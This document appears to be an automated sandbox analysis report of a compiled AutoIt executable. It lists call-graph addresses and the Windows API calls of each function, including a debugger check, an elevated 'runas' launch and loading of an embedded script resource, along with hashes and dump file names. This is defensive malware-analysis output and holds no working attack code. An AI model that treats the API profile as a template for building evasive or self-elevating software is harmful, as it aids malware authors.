c8c528 Mailbox 106925->106926 107051 c19a3c 59 API calls Mailbox 106925->107051 106926->106793 106927 c8c4e2 106930 c17cab 59 API calls 106927->106930 106929 c8c4fd 106933 c17cab 59 API calls 106929->106933 106931 c8c4ef 106930->106931 106935 c17b2e 59 API calls 106931->106935 106932 c17924 59 API calls 106932->106947 106936 c8c50c 106933->106936 106934 c18047 59 API calls 106934->106947 106935->106925 106938 c17b2e 59 API calls 106936->106938 106937 c17e4f 59 API calls 106940 c8c3a9 CharUpperBuffW 106937->106940 106938->106925 106939 c17e4f 59 API calls 106941 c8c469 CharUpperBuffW 106939->106941 107038 c1843a 68 API calls 106940->107038 107039 c1c5a7 106941->107039 106944 c19837 84 API calls 106944->106947 106945 c17cab 59 API calls 106945->106947 106946 c17b2e 59 API calls 106946->106947 106947->106924 106947->106925 106947->106926 106947->106927 106947->106929 106947->106932 106947->106934 106947->106937 106947->106939 106947->106944 106947->106945 106947->106946 106949 c77962 106948->106949 106950 c30db6 Mailbox 59 API calls 106949->106950 106951 c77970 106950->106951 106952 c7797e 106951->106952 106953 c17667 59 API calls 106951->106953 106952->106793 106953->106952 107054 c660c0 106954->107054 106956 c6618c 106956->106793 106957->106800 106958->106800 106959->106793 106960->106820 106961->106810 106962->106780 106963->106793 106964->106790 106965->106817 106966->106817 106967->106817 106968->106789 106969->106783 106970->106789 106972 c155a2 106971->106972 106973 c1557d 106971->106973 106974 c17d8c 59 API calls 106972->106974 106973->106972 106976 c1558c 106973->106976 106981 c7325e 106974->106981 106997 c15ab8 106976->106997 106979 c7328d 106979->106858 106981->106979 106995 c731fa ReadFile SetFilePointerEx 106981->106995 106996 c17924 59 API calls 2 library calls 106981->106996 106985 c7339c Mailbox 106985->106858 106986->106833 106987->106861 106988->106862 106989->106836 106990->106836 106991->106840 106992->106847 106993->106854 106994->106860 106995->106981 106996->106981 106998 c30db6 Mailbox 59 API calls 106997->106998 106999 c15acb 106998->106999 107000 c30db6 Mailbox 59 API calls 106999->107000 107001 c15ad7 107000->107001 107002 c154d2 107001->107002 107009 c158cf 107002->107009 107004 c15bc0 2 API calls 107006 c154e3 107004->107006 107005 c15514 107005->106985 107008 c177da 61 API calls Mailbox 107005->107008 107006->107004 107006->107005 107016 c15a7a 107006->107016 107008->106985 107010 c158e0 107009->107010 107011 c4dc3c 107009->107011 107010->107006 107025 c65ecd 59 API calls Mailbox 107011->107025 107013 c4dc46 107014 c30db6 Mailbox 59 API calls 107013->107014 107015 c4dc52 107014->107015 107017 c4dcee 107016->107017 107018 c15a8e 107016->107018 107031 c65ecd 59 API calls Mailbox 107017->107031 107026 c159b9 107018->107026 107021 c15a9a 107021->107006 107022 c4dcf9 107023 c30db6 Mailbox 59 API calls 107022->107023 107024 c4dd0e _memmove 107023->107024 107025->107013 107027 c159d1 107026->107027 107030 c159ca _memmove 107026->107030 107028 c4dc7e 107027->107028 107029 c30db6 Mailbox 59 API calls 107027->107029 107029->107030 107030->107021 107031->107022 107032->106867 107033->106912 107034->106911 107035->106874 107036->106909 107037->106909 107038->106947 107040 c17a16 59 API calls 107039->107040 107041 c1c5cc _wcscmp 107040->107041 107042 c17de1 59 API calls 107041->107042 107044 c1c600 Mailbox 107041->107044 107043 c51691 107042->107043 107045 c17b2e 59 API calls 107043->107045 107044->106947 107046 c5169c 107045->107046 107052 c1843a 68 API calls 107046->107052 107048 c516ad 107050 c516b1 Mailbox 107048->107050 107053 c19d3c 60 API calls Mailbox 107048->107053 107050->106947 107051->106926 107052->107048 107053->107050 107055 c660cb 107054->107055 107056 c660e8 107054->107056 107055->107056 107058 c660ab 59 API calls Mailbox 107055->107058 107056->106956 107058->107055 107059 c1e5ab 107062 c1d100 107059->107062 107061 c1e5b9 107063 c1d37d 107062->107063 107064 c1d11d 107062->107064 107077 c1d54b 107063->107077 107111 c79e4a 89 API calls 4 library calls 107063->107111 107065 c52691 107064->107065 107066 c526e0 107064->107066 107095 c1d144 107064->107095 107069 c52694 107065->107069 107070 c526af 107065->107070 107106 c8a3e6 341 API calls __cinit 107066->107106 107071 c526a0 107069->107071 107069->107095 107070->107063 107105 c8aea2 341 API calls 3 library calls 107070->107105 107104 c8a9fa 341 API calls 107071->107104 107072 c32d40 __cinit 67 API calls 107072->107095 107075 c1d434 107098 c18a52 68 API calls 107075->107098 107076 c528b5 107076->107076 107077->107061 107081 c1d443 107081->107061 107082 c527fc 107110 c8a751 89 API calls 107082->107110 107085 c184c0 69 API calls 107085->107095 107092 c19ea0 341 API calls 107092->107095 107093 c18047 59 API calls 107093->107095 107095->107063 107095->107072 107095->107075 107095->107077 107095->107082 107095->107085 107095->107092 107095->107093 107096 c18740 68 API calls __cinit 107095->107096 107097 c18542 68 API calls 107095->107097 107099 c1843a 68 API calls 107095->107099 107100 c1cf7c 341 API calls 107095->107100 107101 c19dda 59 API calls Mailbox 107095->107101 107102 c1cf00 89 API calls 107095->107102 107103 c1cd7d 341 API calls 107095->107103 107107 c18a52 68 API calls 107095->107107 107108 c19d3c 60 API calls Mailbox 107095->107108 107109 c6678d 60 API calls 107095->107109 107096->107095 107097->107095 107098->107081 107099->107095 107100->107095 107101->107095 107102->107095 107103->107095 107104->107077 107105->107063 107106->107095 107107->107095 107108->107095 107109->107095 107110->107063 107111->107076 107112 c1552a 107113 c15ab8 59 API calls 107112->107113 107114 c1553c 107113->107114 107115 c154d2 61 API calls 107114->107115 107116 c1554a 107115->107116 107118 c1555a Mailbox 107116->107118 107119 c18061 61 API calls Mailbox 107116->107119 107119->107118 107120 c1107d 107125 c1708b 107120->107125 107122 c1108c 107123 c32d40 __cinit 67 API calls 107122->107123 107124 c11096 107123->107124 107126 c1709b __ftell_nolock 107125->107126 107127 c17667 59 API calls 107126->107127 107128 c17151 107127->107128 107129 c14706 61 API calls 107128->107129 107130 c1715a 107129->107130 107156 c3050b 107130->107156 107133 c17cab 59 API calls 107134 c17173 107133->107134 107135 c13f74 59 API calls 107134->107135 107136 c17182 107135->107136 107137 c17667 59 API calls 107136->107137 107138 c1718b 107137->107138 107139 c17d8c 59 API calls 107138->107139 107140 c17194 RegOpenKeyExW 107139->107140 107141 c4e8b1 RegQueryValueExW 107140->107141 107146 c171b6 Mailbox 107140->107146 107142 c4e943 RegCloseKey 107141->107142 107143 c4e8ce 107141->107143 107142->107146 107148 c4e955 _wcscat Mailbox __wsetenvp 107142->107148 107144 c30db6 Mailbox 59 API calls 107143->107144 107145 c4e8e7 107144->107145 107147 c1522e 59 API calls 107145->107147 107146->107122 107149 c4e8f2 RegQueryValueExW 107147->107149 107148->107146 107150 c179f2 59 API calls 107148->107150 107154 c17de1 59 API calls 107148->107154 107155 c13f74 59 API calls 107148->107155 107151 c4e90f 107149->107151 107153 c4e929 107149->107153 107150->107148 107152 c17bcc 59 API calls 107151->107152 107152->107153 107153->107142 107154->107148 107155->107148 107157 c41940 __ftell_nolock 107156->107157 107158 c30518 GetFullPathNameW 107157->107158 107159 c3053a 107158->107159 107160 c17bcc 59 API calls 107159->107160 107161 c17165 107160->107161 107161->107133 107162 c1b40e 107170 c2f944 107162->107170 107164 c1b424 107165 c1c5a7 69 API calls 107164->107165 107166 c1b44c 107165->107166 107167 c1a388 107166->107167 107179 c79e4a 89 API calls 4 library calls 107166->107179 107169 c508e9 107171 c2f962 107170->107171 107172 c2f950 107170->107172 107174 c2f991 107171->107174 107175 c2f968 107171->107175 107180 c19d3c 60 API calls Mailbox 107172->107180 107181 c19d3c 60 API calls Mailbox 107174->107181 107177 c30db6 Mailbox 59 API calls 107175->107177 107178 c2f95a 107177->107178 107178->107164 107179->107169 107180->107178 107181->107178

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C13B68
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00C13B7A
                                                                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00CD52F8,00CD52E0,?,?), ref: 00C13BEB
                                                                                                                              • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                                                                              • Part of subcall function 00C2092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00C13C14,00CD52F8,?,?,?), ref: 00C2096E
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C13C6F
                                                                                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00CC7770,00000010), ref: 00C4D281
                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00CD52F8,?,?,?), ref: 00C4D2B9
                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00CC4260,00CD52F8,?,?,?), ref: 00C4D33F
                                                                                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 00C4D346
                                                                                                                              • Part of subcall function 00C13A46: GetSysColorBrush.USER32(0000000F), ref: 00C13A50
                                                                                                                              • Part of subcall function 00C13A46: LoadCursorW.USER32(00000000,00007F00), ref: 00C13A5F
                                                                                                                              • Part of subcall function 00C13A46: LoadIconW.USER32(00000063), ref: 00C13A76
                                                                                                                              • Part of subcall function 00C13A46: LoadIconW.USER32(000000A4), ref: 00C13A88
                                                                                                                              • Part of subcall function 00C13A46: LoadIconW.USER32(000000A2), ref: 00C13A9A
                                                                                                                              • Part of subcall function 00C13A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C13AC0
                                                                                                                              • Part of subcall function 00C13A46: RegisterClassExW.USER32(?), ref: 00C13B16
                                                                                                                              • Part of subcall function 00C139D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C13A03
                                                                                                                              • Part of subcall function 00C139D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C13A24
                                                                                                                              • Part of subcall function 00C139D5: ShowWindow.USER32(00000000,?,?), ref: 00C13A38
                                                                                                                              • Part of subcall function 00C139D5: ShowWindow.USER32(00000000,?,?), ref: 00C13A41
                                                                                                                              • Part of subcall function 00C1434A: _memset.LIBCMT ref: 00C14370
                                                                                                                              • Part of subcall function 00C1434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C14415
                                                                                                                            Strings
                                                                                                                            • This is a third-party compiled AutoIt script., xrefs: 00C4D279
                                                                                                                            • runas, xrefs: 00C4D33A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                                                            • API String ID: 529118366-3287110873
                                                                                                                            • Opcode ID: de5dfd1ea3e528640fcad6b76919c5b05a814994558176ef6f28946e5567ccf5
                                                                                                                            • Instruction ID: 50bb9733143720ef05e386466da9bbd2bed0ed78afbf5453832dfac18a333dff
                                                                                                                            • Opcode Fuzzy Hash: de5dfd1ea3e528640fcad6b76919c5b05a814994558176ef6f28946e5567ccf5
                                                                                                                            • Instruction Fuzzy Hash: D8510A70E08148EECF11EBB5DC15FED7B74AF46714F00426BF462A22A1DA708686FB61

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 997 c149a0-c14a00 call c17667 GetVersionExW call c17bcc 1002 c14a06 997->1002 1003 c14b0b-c14b0d 997->1003 1005 c14a09-c14a0e 1002->1005 1004 c4d767-c4d773 1003->1004 1006 c4d774-c4d778 1004->1006 1007 c14b12-c14b13 1005->1007 1008 c14a14 1005->1008 1010 c4d77a 1006->1010 1011 c4d77b-c4d787 1006->1011 1009 c14a15-c14a4c call c17d2c call c17726 1007->1009 1008->1009 1019 c4d864-c4d867 1009->1019 1020 c14a52-c14a53 1009->1020 1010->1011 1011->1006 1013 c4d789-c4d78e 1011->1013 1013->1005 1015 c4d794-c4d79b 1013->1015 1015->1004 1017 c4d79d 1015->1017 1021 c4d7a2-c4d7a5 1017->1021 1022 c4d880-c4d884 1019->1022 1023 c4d869 1019->1023 1020->1021 1024 c14a59-c14a64 1020->1024 1025 c14a93-c14aaa GetCurrentProcess IsWow64Process 1021->1025 1026 c4d7ab-c4d7c9 1021->1026 1031 c4d886-c4d88f 1022->1031 1032 c4d86f-c4d878 1022->1032 1027 c4d86c 1023->1027 1028 c14a6a-c14a6c 1024->1028 1029 c4d7ea-c4d7f0 1024->1029 1033 c14aac 1025->1033 1034 c14aaf-c14ac0 1025->1034 1026->1025 1030 c4d7cf-c4d7d5 1026->1030 1027->1032 1035 c4d805-c4d811 1028->1035 1036 c14a72-c14a75 1028->1036 1039 c4d7f2-c4d7f5 1029->1039 1040 c4d7fa-c4d800 1029->1040 1037 c4d7d7-c4d7da 1030->1037 1038 c4d7df-c4d7e5 1030->1038 1031->1027 1041 c4d891-c4d894 1031->1041 1032->1022 1033->1034 1042 c14ac2-c14ad2 call c14b37 1034->1042 1043 c14b2b-c14b35 GetSystemInfo 1034->1043 1047 c4d813-c4d816 1035->1047 1048 c4d81b-c4d821 1035->1048 1044 c4d831-c4d834 1036->1044 1045 c14a7b-c14a8a 1036->1045 1037->1025 1038->1025 1039->1025 1040->1025 1041->1032 1054 c14ad4-c14ae1 call c14b37 1042->1054 1055 c14b1f-c14b29 GetSystemInfo 1042->1055 1046 c14af8-c14b08 1043->1046 1044->1025 1051 c4d83a-c4d84f 1044->1051 1052 c14a90 1045->1052 1053 c4d826-c4d82c 1045->1053 1047->1025 1048->1025 1056 c4d851-c4d854 1051->1056 1057 c4d859-c4d85f 1051->1057 1052->1025 1053->1025 1062 c14ae3-c14ae7 GetNativeSystemInfo 1054->1062 1063 c14b18-c14b1d 1054->1063 1059 c14ae9-c14aed 1055->1059 1056->1025 1057->1025 1059->1046 1061 c14aef-c14af2 FreeLibrary 1059->1061 1061->1046 1062->1059 1063->1062
                                                                                                                            APIs
                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 00C149CD
                                                                                                                              • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                                                                            • GetCurrentProcess.KERNEL32(?,00C9FAEC,00000000,00000000,?), ref: 00C14A9A
                                                                                                                            • IsWow64Process.KERNEL32(00000000), ref: 00C14AA1
                                                                                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00C14AE7
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C14AF2
                                                                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00C14B23
                                                                                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00C14B2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1986165174-0
                                                                                                                            • Opcode ID: 771eff3e61fb6547d34b0e23a978fdbe9f3201f5e7fe819061aebeb0399ec6bc
                                                                                                                            • Instruction ID: f93c5dd7b6ead0d7e38c7a6945980b5e1cac89386120c3858514e801e4952193
                                                                                                                            • Opcode Fuzzy Hash: 771eff3e61fb6547d34b0e23a978fdbe9f3201f5e7fe819061aebeb0399ec6bc
                                                                                                                            • Instruction Fuzzy Hash: 8C91C53198D7C0DEC735DB6894506EAFFF5BF2A300B4449AED0D793A41D220E688E769

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 1064 c14e89-c14ea1 CreateStreamOnHGlobal 1065 c14ec1-c14ec6 1064->1065 1066 c14ea3-c14eba FindResourceExW 1064->1066 1067 c14ec0 1066->1067 1068 c4d933-c4d942 LoadResource 1066->1068 1067->1065 1068->1067 1069 c4d948-c4d956 SizeofResource 1068->1069 1069->1067 1070 c4d95c-c4d967 LockResource 1069->1070 1070->1067 1071 c4d96d-c4d975 1070->1071 1072 c4d979-c4d98b 1071->1072 1072->1067
                                                                                                                            APIs
                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C14D8E,?,?,00000000,00000000), ref: 00C14E99
                                                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C14D8E,?,?,00000000,00000000), ref: 00C14EB0
                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,00C14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C14E2F), ref: 00C4D937
                                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00C14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C14E2F), ref: 00C4D94C
                                                                                                                            • LockResource.KERNEL32(00C14D8E,?,?,00C14D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C14E2F,00000000), ref: 00C4D95F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                            • String ID: SCRIPT
                                                                                                                            • API String ID: 3051347437-3967369404
                                                                                                                            • Opcode ID: e3532827732289bcff4fa2e693fa4ac1b7dadee96052de310ebdb50416e13ff7
                                                                                                                            • Instruction ID: ec3ca390986dce1c7bfcf37dd801091686abca3f49e0e0749dcaddf68dcdf264
                                                                                                                            • Opcode Fuzzy Hash: e3532827732289bcff4fa2e693fa4ac1b7dadee96052de310ebdb50416e13ff7
                                                                                                                            • Instruction Fuzzy Hash: CC115EB5240700BFD7258B65EC48F6BBBBAFFC6B11F20426DF416C6250DBA1E8419660
                                                                                                                            APIs
                                                                                                                            • IsThemeActive.UXTHEME ref: 00C14834
                                                                                                                              • Part of subcall function 00C3336C: __lock.LIBCMT ref: 00C33372
                                                                                                                              • Part of subcall function 00C3336C: DecodePointer.KERNEL32(00000001,?,00C14849,00C67C74), ref: 00C3337E
                                                                                                                              • Part of subcall function 00C3336C: EncodePointer.KERNEL32(?,?,00C14849,00C67C74), ref: 00C33389
                                                                                                                              • Part of subcall function 00C148FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C14915
                                                                                                                              • Part of subcall function 00C148FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C1492A
                                                                                                                              • Part of subcall function 00C13B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C13B68
                                                                                                                              • Part of subcall function 00C13B3A: IsDebuggerPresent.KERNEL32 ref: 00C13B7A
                                                                                                                              • Part of subcall function 00C13B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00CD52F8,00CD52E0,?,?), ref: 00C13BEB
                                                                                                                              • Part of subcall function 00C13B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00C13C6F
                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C14874
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                            • String ID: (l
                                                                                                                            • API String ID: 1438897964-844116408
                                                                                                                            • Opcode ID: a1fae390ba68466046658ee00300ae0af7375f70caf63a05e6591be656431c03
                                                                                                                            • Instruction ID: 50aaf9b64047f2b17b82387c88f5aeb18ec357ad2c701ffd3c16336f1a695e0d
                                                                                                                            • Opcode Fuzzy Hash: a1fae390ba68466046658ee00300ae0af7375f70caf63a05e6591be656431c03
                                                                                                                            • Instruction Fuzzy Hash: E5119D719093419FD700EF69D845B4EBBE8EF8A750F10891FF040872B1DB70968ADB92
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNELBASE(?,00C4E398), ref: 00C7446A
                                                                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00C7447B
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C7448B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 48322524-0
                                                                                                                            • Opcode ID: 420bab4d1e85da9d9d50ae8ffb64f813b75c7327bdd41793024726552eabcdfb
                                                                                                                            • Instruction ID: 1e19c7620982435d0a540c239cb81483652b38c292e5d6180820064c861f636c
                                                                                                                            • Opcode Fuzzy Hash: 420bab4d1e85da9d9d50ae8ffb64f813b75c7327bdd41793024726552eabcdfb
                                                                                                                            • Instruction Fuzzy Hash: C4E02033410900A742146B38EC0D7ED7B5C9F05335F24471BF939C10E0E7745D00A5D5
                                                                                                                            APIs
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C20A5B
                                                                                                                            • timeGetTime.WINMM ref: 00C20D16
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C20E53
                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 00C20E61
                                                                                                                            • LockWindowUpdate.USER32(00000000,?,?), ref: 00C20EFA
                                                                                                                            • DestroyWindow.USER32 ref: 00C20F06
                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C20F20
                                                                                                                            • Sleep.KERNEL32(0000000A,?,?), ref: 00C54E83
                                                                                                                            • TranslateMessage.USER32(?), ref: 00C55C60
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00C55C6E
                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C55C82
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                            • API String ID: 4212290369-3242690629
                                                                                                                            • Opcode ID: 517819f65d71a0f4cbf575b0506da1f91722b2beafcb91aa11288b091a48b8de
                                                                                                                            • Instruction ID: 68a49700e93ba54ff1a38b543ebc825cd27b599fb6df6ac406a14070ac35169b
                                                                                                                            • Opcode Fuzzy Hash: 517819f65d71a0f4cbf575b0506da1f91722b2beafcb91aa11288b091a48b8de
                                                                                                                            • Instruction Fuzzy Hash: 0DB20374608741DFD724DF24C894BAEB7E0BF85304F24491EF899872A1CB71E989DB86

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C78F5F: __time64.LIBCMT ref: 00C78F69
                                                                                                                              • Part of subcall function 00C14EE5: _fseek.LIBCMT ref: 00C14EFD
                                                                                                                            • __wsplitpath.LIBCMT ref: 00C79234
                                                                                                                              • Part of subcall function 00C340FB: __wsplitpath_helper.LIBCMT ref: 00C3413B
                                                                                                                            • _wcscpy.LIBCMT ref: 00C79247
                                                                                                                            • _wcscat.LIBCMT ref: 00C7925A
                                                                                                                            • __wsplitpath.LIBCMT ref: 00C7927F
                                                                                                                            • _wcscat.LIBCMT ref: 00C79295
                                                                                                                            • _wcscat.LIBCMT ref: 00C792A8
                                                                                                                              • Part of subcall function 00C78FA5: _memmove.LIBCMT ref: 00C78FDE
                                                                                                                              • Part of subcall function 00C78FA5: _memmove.LIBCMT ref: 00C78FED
                                                                                                                            • _wcscmp.LIBCMT ref: 00C791EF
                                                                                                                              • Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79824
                                                                                                                              • Part of subcall function 00C79734: _wcscmp.LIBCMT ref: 00C79837
